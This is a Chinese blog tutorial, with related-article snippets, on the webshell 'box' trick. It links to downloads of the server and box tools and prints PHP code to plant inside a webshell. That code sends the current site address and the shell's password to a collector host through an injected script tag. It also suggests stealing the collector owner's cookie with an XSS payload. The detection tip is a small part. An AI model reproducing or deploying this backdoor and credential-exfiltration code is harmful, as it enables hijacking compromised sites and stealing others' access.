摘要:目录黑吃黑箱子环境准备马中马预防后门反杀黑吃黑箱子什么是箱子通俗一点的解释它可以让你在中植入后门,当别人用你植入过后门的去获取渗透别的网站时,你的信封将会收到他留下的后门地址以及密码环境准备搭建一个的服务器,我们这里选用
什么是webshell箱子?通俗一点的解释:
它可以让你在webshell中植入后门,当别人用你植入过后门的webshell去获取渗透别的网站时,你的webshellbox信封将会收到他留下的后门地址以及密码
搭建一个asp的服务器,我们这里选用小旋风进行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.zip下载完成后解压到虚拟机里面。
箱子:https://pan.baidu.com/s/1D3msIms4Rcf098fqWdQgzQ
提取码:6666
细节我就不说了,搭建至下图这一步
插入到大马的代码中:
<?php//假设这是某大马的php文件//某大马的后门密码变量如下$password="admin";//马中马[doge]$u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"];echo "<script src="http://192.168.56.104/api.asp?url=$u&pass=$password"></script>";?>
解释:
&_SERVER["PHP_SELE"];
正在执行的脚本文件名
$_SERVER["HTTP_HOST"];
获取当前请求的host头部内容(网站地址)
上面两句实现获取当前网站的ip地址
echo "
指向信封(webshellbox)当大马获取的东西,你的webshellbox也能获取一份";
另外:echo这句语法可以在webshellbox文件中查看到(ASP的就用第一句、PHP的就用第二句):
最后访问网站后,webshell自动获取了大马的后门,以及后门密码
如何判断自己使用的大马中没有被植入后门呢?
一般可以采用抓包,查看大马中有没有向一些奇怪的网站发送包
当找到后门地址后,甚至可以采用xss跨站攻击盗取cookie进行反杀…
采用burpsuite抓包,抓到后门包后,将pass改为xss跨站攻击代码
当登录到后台查看时,成功爆出跨站代码
相关文章:
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/123241.html
摘要:常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。由于其大多是以动态脚本的形式出现,也有人称之为网站的后门工具。 目录 什么是webshell拿we...
摘要:是一款精简的基于命令行的管理工具,它有着多种发送方式和编码方式,以及精简的代码,使得它成为隐蔽的暗杀者,难以被很好的防御。AssassinAssassin是一款精简的基于命令行的webshell管理工具,它有着多种payload发送方式和编码方式,以及精简的payload代码,使得它成为隐蔽的暗杀者,难以被很好的防御。自用工具开源互相学习,工具短小精悍,生成的webshell能够过目前主流杀...
摘要:本章主要以常见的数据集为例子介绍基于文件特征的检测技术。由国内后知名创业者钟胜辉网名淡淡风于年创办,是国内知名的站长建站工具。年,创办人钟胜辉离开,创办国内针对媒体领域的产品思拓合众。 GitChat 作者:兜哥原文: 基于机器学习的 Webshell 发现技术探索关注公众号:GitChat 技术杂谈,一本正经的讲技术 第十一章WebShell检测 WebShell就是以ASP、PHP...
摘要:该漏洞无需经过身份验证即可远程利用,攻击复杂度低,且无需用户交互。目前已经检测到攻击者正在扫描和攻击存在漏洞的服务器。 目录 漏洞描述 影响版本 漏洞批量检测poc 漏洞EXP 修复建议 声明:切勿用于非法入侵,仅供检测与学习!传送门 ——> 中华人民共和国网络安全法 漏洞描述 2021年9...
摘要:一句话工具,中国菜刀一句话木马我们上传了一句话木马后,可用中国菜刀进行连接原理执行是一句话木马所在的位置制作图片一句话抓包根据应用显示抓的包 一句话工具weevely,中国菜刀 asp一句话木马 我们上传了一句话木马后,可用中国菜刀进行连接 showImg(https://segmentfault.com/img/bVbtgyz?w=887&h=550); 原理 :执行http://...
阅读 815·2021-11-24 09:39
阅读 3357·2021-11-22 13:54
阅读 2709·2021-11-22 09:34
阅读 2779·2021-11-19 09:40
阅读 3332·2021-11-15 11:37
阅读 1026·2021-11-11 16:54
阅读 2371·2021-10-11 10:59
阅读 554·2021-09-02 15:40